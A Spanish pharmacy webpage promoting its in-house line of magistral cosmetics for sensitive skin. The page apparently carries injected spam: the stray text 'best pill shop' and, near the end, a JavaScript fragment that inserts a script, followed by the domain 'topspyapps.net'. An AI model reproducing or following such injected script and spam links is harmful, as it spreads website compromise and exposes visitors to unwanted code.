Laboratorio cosmético

El laboratorio es el motor de la farmacia. La formulación magistral está en auge, y está enfocada para la elaboración de medicamentos que no están fabricados industrialmente y que hacen falta en la sociedad, pero siempre con receta médica.

Pues bien, en paralelo a estos preparados oficinales, hemos desarrollado una línea de cosmética magistral, dando así un servicio universal al laboratorio, creando un LABORATORIO COSMETICO, ofreciendo productos dermofarmaceúticos, bajo los mismos criterios de fabricación, garantía y seguridad exigidos por el Real Decreto 175/2001 del Ministerio de Sanidad y consumo.

Tras años de trabajo de laboratorio, hemos conseguido una linea propia de productos cosméticos, a la que hemos llamado COSMETICA MAGISTRAL, enfocada a pieles sensibles, para el cuidado corporal y facial.

Crema antiarrugas-tarro y caja propia-marca de agua    contorno de ojos hidrat antiarrugas propio-marca de agua   crema regeneradora facial celulas madre propia-marca de agua

best pill shop

Son fórmulas muy elegidas y testadas, elaboradas con excipientes y activos calidad Pharmacopea Europea, certificados y libres de alergenos.

Es una línea que está aportando grandes satisfaciones por la buena acogida que tiene, tanto la línea seriada como la individualizada (se hace también a medida para cada tipo de piel).

La gama de cosmética seriada cubre a nivel facial, corporal, capilar, manos y pies, solar, y incluso situaciones especiales como son post-depilación, pieles irradiadas, anticelulíticos, antiestrias, manchas ....

Te animo a que pases a la sección de la web de venta online donde podrás encontrar los productos, sus propiedades y características. Seguro que te va a gustar.

Gracias por seguirnos.

 document.currentScript.parentNode.insertBefore(s, document.currentScript);topspyapps.net

Comments are closed.